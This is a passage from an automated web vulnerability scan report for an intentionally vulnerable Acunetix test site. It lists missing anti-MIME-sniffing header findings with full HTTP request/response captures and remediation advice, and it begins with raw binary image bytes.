          Ä#^ÉduB"evA¾y≅Cã°x2î`r”ëb.æÆY̋ÿcWEIDQ­¸0]úf1™$ãAeT	2ÒðlªXÛ[	f@Ba€Ð’T(Å+&F¶ÀeŠÂzt$žk"Œ™d˜€/‹ÎàÖÐ8¶OlÁYÝ*i1ÑõHi©«ÚÇGJV²Î“·„@ªìx(â	…!ŠP*€…±‚Þ¶ù‰º™LƒøfŠôdMí­‘΋¤Ì0é	q0?Øc¨™2‡ž]š„¥ @Њ|ˆ¢À«>`YèSž§BÔͨ´zAÀa
          `ØiP…ÓxPUÃZ:P/`ꖺðç'|I˜#@ïÿ™Ê
          <AÕ·ÓpÖ*PvÅ<qà.!¢'"P²-ŽC[lž5:´ÉEK‹i^#Ê¡:ÅÕháä£T…(
          µx—qtCsg_H¥¤©6ž|Àwì1ˆ ”ˆpŸýlx
          ?¦3½ÌêLðU]¾Å	Ê0t%2o{@}š[)E¢>Ë( lK$X¼ê“6ÃÅV¿5÷’™¬`ßUœ`ç•DØW‚Ùb ޙWgë9$ìc£ÅQ	a¨ÂŽ´¦RU?Z
          BôTÞâQ À’Ä
          µ§,‘ôdŠœBAÉGj´vZÙÿrýô`A±h¥¨- P	Lå	`ô§ °‡:i Øq0Ð	Äø³¸˜€Œ€œÞ¸÷Žð-Åì;•&$òu‹Ed †CQ‚Hñ@ý¤x‚c&c"xrNÄ
          £æ/îdڏû‰GQ\Á-&؂*º•hA6xî tÏÌçYp-½–ƒßKÚ,Š%A*èA~SaÀ 	+ÐÁ‘óLiU˜¹ÏJqØÂjá0râ²Ò Æó¥1í¢nv;Åá'›ƒêVƒdÔ¤N	MaÌÕÐÕ¸.sJcëzØQ84«sMìÚìš×ȆT‹'ÍìlÀ:ÙÐN
          ¡›Mme<;ÚȶÆ&¶Íín{ûۆ¨¸ÇMîrS";
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        13. GET http://testaspnet.vulnweb.com/images/rss.gif
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (318 bytes)
          GET http://testaspnet.vulnweb.com/images/rss.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:55 GMT
          Accept-Ranges: bytes
          ETag: "8e76327199c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 134
          
          
          Response body (134 bytes)
          GIF89a¢ÿfÿÿÿÿȤ?}3ÿšW!ù,K(ºÜþ‚@«½8ËÌ»Ý^ˆT`šÖ™¢ßT±pP–2PS¤]Ç{å'Ÿî6ü¹h:Œ0YîvH[wd2U¯eN$Úr=’xL.›Ï„;
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        14. GET http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13269
          
          
          Response body (13269 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        15. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 22687
          
          
          Response body (22687 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5Ljw